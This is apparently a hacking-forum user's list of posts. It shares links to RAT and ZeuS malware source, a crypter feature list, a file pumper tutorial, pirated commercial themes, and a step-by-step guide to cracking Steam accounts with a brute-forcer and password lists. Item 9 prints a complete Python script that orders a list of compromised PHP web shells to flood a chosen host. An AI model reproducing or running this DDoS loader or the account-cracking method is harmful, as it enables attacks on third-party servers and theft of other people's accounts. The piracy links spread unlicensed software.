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Everything posted by SilviuCS

  1. As fi postat ceva informatii da nu am gasit pe google
  2. Source Code: #1074561 - Pastie Pics: Flooding: Port Scanning:
  3. MEGAUPLOAD - The leading online storage and file delivery service
  4. MEGAUPLOAD - The leading online storage and file delivery service Source:http://fkn0wned.com
  5. Great RAT to learn from. MEGAUPLOAD - The leading online storage and file delivery service
  6. SilviuCS


    Its a cool rat source MEGAUPLOAD - The leading online storage and file delivery service
  7. MEGAUPLOAD - The leading online storage and file delivery service
  8. MEGAUPLOAD - The leading online storage and file delivery service
  9. The following code is a simple python script for loading up gny shells (php shells) and issuing the same ddos command to every shell in your list (ddos.txt) It uses threading to process each site faster. import time, urllib2, threading, socket, sys, os from threading import Thread socket.setdefaulttimeout(5) print ''' /////////////////////////////////////////////// /GNY DDOS Shell Loader - v1.0 - Coded by ro_0t/ /////////////////////////////////////////////// ''' if os.path.isfile("ddos.txt") == False: raw_input('Could not find "ddos.txt" - Press any key to exit.') sys.exit() iptoddos = raw_input("HOST/IP TO ATTACK: ") timetoddos = raw_input("LENGTH OF ATTACK(s): ") lol = "ddos.txt" print "\n[Target: " + iptoddos + "]\n" print "[Time: " + timetoddos + "]\n" print "[Loading Shells...]\n" file = open(lol, 'r') class OmG (threading.Thread): def __init__(self,x): self.__x = x threading.Thread.__init__(self) def run (self): omfg = x + "?act=phptools&host=" + iptoddos + "&time=" + timetoddos try: print "Loading " + x + "..." urllib2.urlopen(omfg) except: pass while 1: lines = file.readlines(10000) if not lines: break for line in lines: time.sleep(1) x = line.rstrip("\n") current = OmG(x) current.start()
  10. ZeuS Source:Fkn0wned - Welcome to the Cheat-Scene
  11. Ok, in this tutorial i will explain you about how to make your own file pumper. What is file pumper? If you have a file that is too small, well you can pump it with this program, so it's size will be changed as you wish. We need some components to be added to our form. TextBox1 NumericUpDown1 RadioButton1 RadioButton2 Button1 Button2 And set the components. NumericUpDown1 : [will be used to show how much byte will be added] Value = 10 Minimum = 10 RadioButton1: [self explanatory] Text = KiloByte RadioButton2: [self explanatory] Text = MegaByte Checked = true Button1: [process the pumping] Text = PUMP ! Button2: [browse the file] Text: ... Now, double click on the Button2 and put this code Dim ofd As New OpenFileDialog ofd.Filter = "Exe Files|*.exe" ofd.ShowDialog() TextBox1.Text = ofd.FileName this will show up the file dialog when users click the button2 and put this code for the button1 Dim sfd As New SaveFileDialog sfd.Filter = "Exe Files|*.exe" sfd.ShowDialog() Dim filesize As Double = Val(NumericUpDown1.Value) IO.File.Copy(TextBox1.Text, sfd.FileName) If RadioButton1.Checked Then filesize = filesize * 1024 End If If RadioButton2.Checked Then filesize = filesize * 1048576 End If Dim filetopump = IO.File.OpenWrite(sfd.FileName) Dim size = filetopump.Seek(0, IO.SeekOrigin.[End]) While size < filesize filetopump.WriteByte(0) size += 1 End While filetopump.Close() MsgBox("Successfully Pumped!") Source: http://fkn0wned.com
  12. Features Supports Multiple Files (Either scramble each file into separate stubs, or all files into same stub) Encryption Key Encryption Layers (harder to decrypt) File Scramble (scrambles the whole file around) Icon Change (not the best one, use other tool for better quality) Memory Execution or Drop to Harddrive Use Custom Stub Support EOF-Data Each file can have parameters NTDLL's Compression Add Garbage data to EOF MEGAUPLOAD - The leading online storage and file delivery service
  13. Welcome mate.
  14. Hey guys, Today i will be showing you a tutorial how to crack steam account with BruteSteam. BruteSteam is a remade/updated version of the orginial Bruteforcer 1. Download the file and run Brutesteam. It should look like this. 2. Choose the settings you want to use. 3. Here you can scan groups for usernames. Press Find Groups for scanning groups ! 4.When your scanning for groups , press find user names. Then the program starts scanning from the groups. I advise you to save them. By pressing export to list you export them to the first screen, in usernames loaded. 5. Username checker.Here can you check if the steam account still exists and if its the right username. 6. Lets start cracking! Full credits go to Pedrock & c0nw0nk and me for uploading tutorial here =D Extra information. - Close steam before you start cracking - This cant get your steam account banned - If you get troubleshooting errors while trying to login after cracking, refresh your ip or wait 30 min - In the map i also added 3 passwords list BruteSteam_2.3.zip Scan: BruteSteam_2.3.zip - Jotti's malware scan
  15. Cumpar steam,pot oferi euro pe telefon in retele orange/vodafone. Pentru mai multe informatii dati PM.
  16. RocketTheme - Camber For J1.7.rar Source:Fkn0wned - Welcome to the Cheat-Scene
  17. WooThemes - Antisocial v1.3.5 For Wordpress.zip Source:Fkn0wned - Welcome to the Cheat-Scene
  18. WooThemes - Aperture v2.6 For Wordpress.zip Source:Fkn0wned - Welcome to the Cheat-Scene
  19. Zootemplate - Software Joomla Templates - ZT Evio For J1.7.rar Source:Fkn0wned - Welcome to the Cheat-Scene
  20. Demo: Flash - 3D Realistic Snow, AS2 / AS3 - ActiveDen Download AD-3d-realistic-snow-as2-as3.zip for free on Filesonic.com Source:Fkn0wned - Welcome to the Cheat-Scene
  21. Completevb - Gamer Green Skin for vBulletin 4.0.6 - 4.1.5 - Retail.rar Source:Fkn0wned - Welcome to the Cheat-Scene
  22. Demo: Dashboard Admin Preview - ThemeForest Download TF-dashboard-admin.zip for free on Filesonic.com Source: http://fkn0wned.com
  23. Activeden - Advanced XML Portfolio Website - Retail.zip Source: http://fkn0wned.com
  24. https://rs68tl3.rapidshare.com/#!download|68l35|342072596|11MFEG8CPKNHHFE_1_2_.zip Source:http://fkn0wned.com
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